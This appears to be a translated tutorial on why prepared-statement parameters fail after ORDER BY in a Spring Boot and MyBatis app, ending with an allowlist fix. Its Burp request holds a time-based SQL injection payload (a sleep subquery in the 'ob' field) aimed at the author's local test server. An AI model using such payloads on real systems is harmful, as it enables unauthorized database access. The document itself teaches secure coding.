On implementing ORDER BY ?: why a prepared-statement parameter cannot be used there
Thanks to Long-ge for writing the project for me.
The project is built on the Spring Boot framework and uses MyBatis to connect to a local MySQL database.
Configure the database name, username and password here,
then connect to the database.
The statement used here is a prepared statement; as noted earlier, using a prepared (bound) parameter after ORDER BY causes an error:
select * from users where username = #{username} order by #{ob} desc;
First, test a query that returns only a single row.
The response shows that ob came back empty, that is, the parameter after ORDER BY was never picked up.
Probably for exactly that reason, this query did not throw an error.
Now query for admin and try to sort by id in descending order. Since ob is a prepared parameter, we know the expected result cannot be obtained.
We can see that the descending sort did not take effect, and an exception was thrown.
A normal sorted query should look like this.
So what if the ob parameter position is not prepared (string-substituted instead of bound)? That does indeed give correct sorting.
Sorting now works, but security is broken: the parameter can be injected directly.
Inject using a subquery:
An error is returned saying the subquery returned more than one row, but the query was still executed and caused the delay, so it is injectable.
The Burp request is attached:
POST /user HTTP/1.1
Host: localhost:8081
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: application/json, text/plain, */*
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: remember-me=YWRtaW46MTY0NzU2NjYyNTA1MDo1NzEzYWQwMDJmOTgzNmYxZTI3ODY2ODk3MTMwMzg3Yg
Connection: close
Content-Type: application/json
Content-Length: 86

{ "username":"admin", "ob":"id or (select*from(select+sleep(2)union/**/select+1)a)"}
After the change, the return type is ArrayList<User>, which can receive multiple rows:
POST /user HTTP/1.1
Host: localhost:8081
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: application/json, text/plain, */*
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: remember-me=YWRtaW46MTY0NzU2NjYyNTA1MDo1NzEzYWQwMDJmOTgzNmYxZTI3ODY2ODk3MTMwMzg3Yg
Connection: close
Content-Type: application/json
Content-Length: 29

{ "date":"2022", "ob":"id"}
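The fix that keeps sorting working without the injection described above is to use `${ob}` for the column name but only after checking it against a fixed list of sortable columns. The following is an added example, not the project's own code; the mapper, service and class names, the `users` table and its column list are assumptions.

```java
// Added example (not the original project's code). Assumed names: UserMapper,
// UserService, User and the columns of the "users" table.
import java.util.List;
import java.util.Set;
import org.apache.ibatis.annotations.Mapper;
import org.apache.ibatis.annotations.Param;
import org.apache.ibatis.annotations.Select;
import org.springframework.stereotype.Service;

class User {
    public Long id;
    public String username;
}

@Mapper
interface UserMapper {
    // #{username} is a bound parameter and is safe. #{ob} would also be bound,
    // but bound values are sent as literals, so "ORDER BY ?" becomes
    // "ORDER BY 'id'": the rows are sorted by a constant, i.e. not sorted.
    // ${ob} is substituted into the SQL text before it is prepared, which is
    // why a column name works there and why raw user input must never reach it.
    @Select("select * from users where username = #{username} order by ${ob} desc")
    List<User> findByUsername(@Param("username") String username, @Param("ob") String ob);
}

@Service
class UserService {
    // Columns callers are allowed to sort on; anything else is rejected
    // before it can be substituted into the statement.
    private static final Set<String> SORTABLE = Set.of("id", "username");
    private final UserMapper mapper;

    UserService(UserMapper mapper) {
        this.mapper = mapper;
    }

    public List<User> findSorted(String username, String ob) {
        return mapper.findByUsername(username, sortColumn(ob));
    }

    // Returns the validated column name or throws. "id" passes; a value such as
    // the subquery payload from the request above is rejected outright.
    static String sortColumn(String ob) {
        if (ob == null || !SORTABLE.contains(ob)) {
            throw new IllegalArgumentException("unsupported sort column");
        }
        return ob;
    }
}
```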